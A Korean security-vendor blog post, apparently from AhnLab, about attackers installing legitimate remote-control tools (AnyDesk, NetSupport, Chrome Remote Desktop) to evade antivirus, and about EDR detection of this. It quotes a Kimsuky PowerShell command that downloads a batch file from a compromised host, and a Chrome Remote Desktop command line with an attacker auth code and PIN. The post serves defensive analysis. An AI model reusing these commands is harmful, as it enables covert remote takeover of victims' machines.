원격 제어 도구들을 이용한 감염 시스템 제어 – EDR 탐지

원격 제어 도구는 원격지의 단말기를 관리하고 제어하는 기능을 제공하는 소프트웨어이다. 코로나와 같은 환경에서 재택근무 솔루션으로서도 활용이 가능하며 무인 단말기를 원격에서 제어, 관리 및 보수하는 용도로도 활용된다. 이렇게 정상적인 관리 목적으로 사용하는 원격 제어 도구를 RAT 즉 “Remote Administration Tool”라고 부른다.

참고로 Remcos RAT이나 njRAT, Quasar RAT, AveMaria와 같이 원격에서 감염 시스템을 제어할 수 있는 백도어 유형의 악성코드들 또한 RAT(Remote Access Trojan)라고 부르는데 원격에서 감염 시스템을 제어할 수 있기 때문이다. 이러한 “Remote Access Trojan” 악성코드들은 일반적으로 원격 제어 기능뿐만 아니라 키로깅이나 감염 시스템에 존재하는 계정 정보를 탈취하는 명령 등 악의적으로 사용할 수 있는 다양한 기능들을 제공한다. 물론 Remcos RAT과 같이 제작자가 정상적인 기능들을 홍보하면서 악의적인 사용을 금지한다고 하지만 실제 지원되는 기능들은 악의적인 목적이 아니라면 사용되기 힘든 기능들이 포함된 사례도 존재한다. [1]

일반적으로 공격자들은 감염 시스템을 제어하기 위한 목적으로 “Remote Access Trojan”을 사용하는 경우가 많다. 하지만 이런 악성코드들은 방화벽이나 AntiVirus 제품들에 의해 쉽게 탐지가 가능하다. 이에 따라 최근에는 감염 시스템을 제어하기 위해 “Remote Administration Tool”을 설치하여 보안 제품들을 우회하려고 시도하는 사례가 늘어나고 있다.

1. EDR을 이용한 위협 모니터링

“Remote Administration Tool”은 재택근무나 원격 제어 및 관리를 위한 정상적인 목적으로 사용하는 사례가 많다. 이에 따라 AntiVirus 제품에서는 일반적인 악성코드들과 달리 이러한 도구들을 단순하게 탐지하고 차단하는 데 한계가 존재한다.

공격자들은 이러한 점을 악용하여 최초 침투 과정이나 측면 이동 과정에서 공격 대상 시스템을 제어하기 위해 RAT 악성코드 대신 원격 제어 도구들을 설치하기도 한다. AntiVirus만 설치된 시스템에서는 이러한 공격을 막는 데 한계가 존재하며 EDR을 활용해 의심스러운 행위를 모니터링하고 대응할 필요가 있다.

AhnLab EDR (Endpoint Detection and Response)은 국내 유일의 행위 기반 분석 엔진을 기반으로 엔드포인트 영역에 대해 강력한 위협 모니터링과 분석, 대응 역량을 제공하는 차세대 엔드포인트 위협 탐지 및 대응 솔루션이다. AhnLab EDR은 의심스러운 행위에 관한 유형별 정보를 상시 수집해 탐지 및 분석, 대응 관점에서 사용자가 위협을 정확하게 인식할 수 있는 기능을 제공하며 이를 통해 종합적인 분석을 통해 원인 파악과 적절한 대응, 재발 방지 프로세스를 수립할 수 있다.

2. AnyDesk

AnyDesk는 원격 제어 도구로써 원격 데스크톱, 파일 전송 등 다양한 기능들을 제공한다. 원격 데스크톱이라고 한다면 RDP와 같이 AnyDesk가 설치된 환경에 원격으로 접속하여 GUI 환경에서 제어를 지원하는 프로그램이다.

특정 사용자 환경에 AnyDesk가 설치되어 있고 외부에서 해당 시스템에 접속하려고 할 경우 메시지가 팝업 되며 사용자가 이를 허용한다면 외부에서 해당 시스템에 대한 원격 제어가 가능하다. 이러한 방식 외에도 AnyDesk에 비밀번호를 설정할 수 있는데 이때에는 비밀번호 입력만으로 사용자의 허용 없이 원격 제어가 가능하다. 이러한 점 때문에 실제 AnyDesk는 Conti 랜섬웨어 그룹과 같이 기업 내부망 장악을 목표로 하는 공격자들이 코발트 스트라이크와 함께 사용하는 것으로 알려져 있다.

AhnLab EDR에서는 사용자가 원격 제어를 위해 정상적인 목적으로 AnyDesk를 사용하는 행위에 대해서도 관련 정보를 수집해 보여줌으로써 의심스러운 행위를 인지하고 대응할 수 있게 도와준다.

과거 공격 사례에서 공격자는 부적절하게 관리되고 있는 MS-SQL 서버를 대상으로 AnyDesk를 설치하였다. [2] 공격자는 미터프리터를 이용해 파워쉘 스크립트를 다운로드해 실행하였는데, 해당 스크립트는 다음과 같이 공식 홈페이지에서 AnyDesk를 다운로드해 Silent 모드로 설치한 후 비밀번호 “wocaoybb”를 설정하는 기능을 담당한다.

이러한 방식으로 AnyDesk가 감염 시스템에 설치된 경우 공격자는 다음과 같이 감염 시스템에 접속하여 비밀번호를 입력함으로써 사용자의 동의 없이 원격 제어가 가능해진다.

AhnLab EDR에서는 위의 사례와 같이 공격자가 의심스러운 방식으로 AnyDesk를 설치하는 행위에 대해 위협으로 탐지하여 관리자가 이를 인지할 수 있도록 도와준다.

3. NetSupport

NetSupport는 AnyDesk와 유사한 원격 제어 도구로써 원격 화면 제어 외에도 스크린 캡쳐, 클립보드 공유, 웹 히스토리 정보 수집, 파일 관리, 명령 실행과 같은 기능들을 제공한다.

AhnLab EDR에서는 사용자가 원격 제어를 위해 정상적인 목적으로 NetSupport를 사용하는 행위에 대해서도 관련 정보를 수집해 보여줌으로써 의심스러운 행위를 인지하고 대응할 수 있게 도와준다.

다른 원격 제어 도구들과 비교해서 악의적인 목적으로 사용 가능한 기능들이 지원된다는 점이나 정상 인스톨러를 이용한 설치 과정이 없이 내부 주요 파일들만 사용해서 동작이 가능하다는 점 때문에 다양한 공격자들이 NetSupport를 악용하고 있다. 송장(Invoice), 선적 서류(Shipment Document), 구매 주문서(P.O. – Purchase Order) 등으로 위장한 스팸 메일을 통해 유포되거나 SocGholish라고 하는 소프트웨어 업데이트를 위장한 피싱 페이지를 통해 사용자로 하여금 설치하도록 유도한 사례는 최근까지도 지속되고 있다. ASEC에서는 과거 포켓몬 게임으로 위장한 NetSupport 악성코드 유포 사례를 공개하였다. [3]

공격자는 포켓몬 카드 게임을 위장한 피싱 페이지를 개설하여 사용자들이 해당 웹 페이지에 업로드된 설치 파일을 다운로드하도록 유도하였다. 다운로드된 파일은 NetSupport를 설치하는 악성코드로서 정상 NetSupport 프로그램들과 공격자가 조작한 설정 파일을 생성하고 실행한다. 공격자들은 악성코드를 유포할 때마다 AntiVirus에 탐지되지 않도록 파일의 외형을 변경하는 방식으로 AntiVirus의 파일 진단을 우회한다. 이에 따라 파일 기반의 진단은 한계가 있으며 행위적으로도 정상 소프트웨어인 NetSupport를 설치하는 방식임에 따라 AntiVirus에서 이를 탐지하고 차단하는 데에는 한계가 존재한다.

AhnLab EDR에서는 위의 사례와 같이 의심스러운 실행 파일이 NetSupport를 설치하는 행위에 대해 위협으로 탐지하여 관리자가 이를 인지할 수 있도록 도와준다.

4. Chrome Remote Desktop

구글은 크롬 원격 데스크톱(Chrome Remote Desktop)이라는 기능을 지원한다. 특정 시스템에 사용자의 계정으로 원격 데스크톱 프로그램을 설치할 경우 다른 시스템에서 크롬 웹 브라우저로 해당 시스템에 대한 원격 제어 기능을 제공하는 기능이다. 일반적으로 원격 제어 대상이 되는 시스템의 크롬 브라우저에서 원격 제어를 설정하는 방식이 대부분이겠지만 크롬은 직접 원격 제어 호스트 프로그램을 설치하는 방식도 지원한다.

예를 들어 원격 제어 대상 장비에 크롬 원격 제어 호스트 프로그램을 설치하고 다음과 같은 인자들과 함께 커맨드 라인 명령을 실행할 수 있다. 해당 명령은 크롬 웹 브라우저에서 로그인한 이후 생성할 수 있으며 인증 코드는 매번 변경된다.

“%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe” –code=”인증 코드” –redirect-url=”hxxps://remotedesktop.google[.]com/_/oauthredirect” –name=%COMPUTERNAME%

위와 같은 명령을 실행한 이후 PIN 번호를 입력하면, 이후 크롬 웹 브라우저에서 원격 제어 대상 장비가 온라인 상태인 것을 보여준다. 해당 장비에 접속하고 크롬 원격 제어 호스트 실행 시 입력했던 PIN 번호를 입력하면 크롬 웹 브라우저에서 원격 제어가 가능하다.

AhnLab EDR에서는 사용자가 원격 제어를 위해 정상적인 목적으로 크롬 원격 데스크톱을 사용하는 행위에 대해서도 관련 정보를 수집해 보여줌으로써 의심스러운 행위를 인지하고 대응할 수 있게 도와준다.

북한의 지원을 받고 있다고 알려진 Kimsuky 그룹은 주로 조직의 내부 정보 및 기술 탈취를 목적으로 공격을 진행하고 있다. 이에 따라 백도어 악성코드를 설치한 이후에도 감염 시스템을 원격에서 제어하기 위해 RDP를 활성화하거나 VNC와 같은 악성코드들을 추가적으로 설치하기도 한다. 최근에는 크롬 원격 데스크톱을 악용하여 감염 시스템을 제어하는 사례가 확인되었다. [4]

공격자는 다음과 같은 파워쉘 명령을 실행하여 크롬 원격 데스크톱 호스트 인스톨러를 설치하였으며, 설치가 끝난 이후에는 크롬 원격 데스크톱 호스트를 제어하는 23.bat 파일을 다운로드해 실행하였다.

powershell wget hxxps://dl.google[.]com/dl/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi -outfile c:\programdata\cm.msi powershell wget hxxp://****[.]kr/gnuboard4/23.bat -outfile c:\programdata\23.bat

23.bat 파일은 위의 크롬 원격 데스크톱 실행 명령과 유사하며 “–pin” 인자가 함께 사용되어 커맨드 라인 상으로도 추가적인 작업 없이 동작할 수 있도록 하였다. 공격에 사용된 인증 코드는 공격자의 구글 계정으로 제작된 것인데, 이에 따라 공격자는 크롬 웹 브라우저에서 감염 시스템을 제어할 수 있게 된다.

“%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe” –code=”4/0AbUR2VPfKC4jyx4j-ARJD2NwkebJQOTbicMGcNW1kUn7UNhE0VNaycr3zDhY4tRx9JT4eg” –redirect-url=”hxxps://remotedesktop.google[.]com/_/oauthredirect” –name=%COMPUTERNAME% –pin=230625

AhnLab EDR에서는 위의 사례와 같이 의심스러운 방식으로 크롬 원격 데스크톱을 실행하는 행위에 대해 위협으로 탐지하여 관리자가 이를 인지할 수 있도록 도와준다.

5. 결론

최근 공격자들은 공격 대상을 제어하기 위해 RAT나 백도어 같은 추가적인 악성코드 대신 원격 제어 도구를 설치하는 사례가 늘어나고 있다. 원격 제어 도구는 원격지의 단말기를 제어하거나 관리하기 위한 목적으로 사용 가능한 정상 소프트웨어이다.

공격자는 공격 대상 시스템에 원격 제어 도구를 설치함으로써 공격 대상 시스템을 제어함과 동시에 AntiVirus 기반의 보안 제품을 우회할 수 있다. 이는 원격 제어 도구가 정상 소프트웨어임에 따라 AntiVirus 제품이 이를 단순하게 탐지하고 차단하는 데 한계가 존재하기 때문이다.

AhnLab EDR은 사용자가 원격 제어를 위해 정상적인 목적으로 원격 제어 도구들을 사용하는 행위에 대해서도 관련 정보를 수집해 보여줌으로써 관리자가 의심스러운 행위를 인지하고 대응할 수 있도록 한다. 또한 원격 제어 도구들이 의심스러운 방식으로 설치된 경우 이를 위협으로 탐지하여 관리자가 원인을 파악하고 적절한 대응 및 재발 방지 프로세스를 수립할 수 있도록 도와준다.

행위 진단
– Execution/DETECT.AnyDesk.M11495
– Execution/EDR.AnyDesk.M11496
– Execution/DETECT.NetSupport.M11497
– Execution/EDR.NetSupport.M11498
– Execution/DETECT.RemoteDesktop.M11499
– Execution/EDR.RemoteDesktop.M11500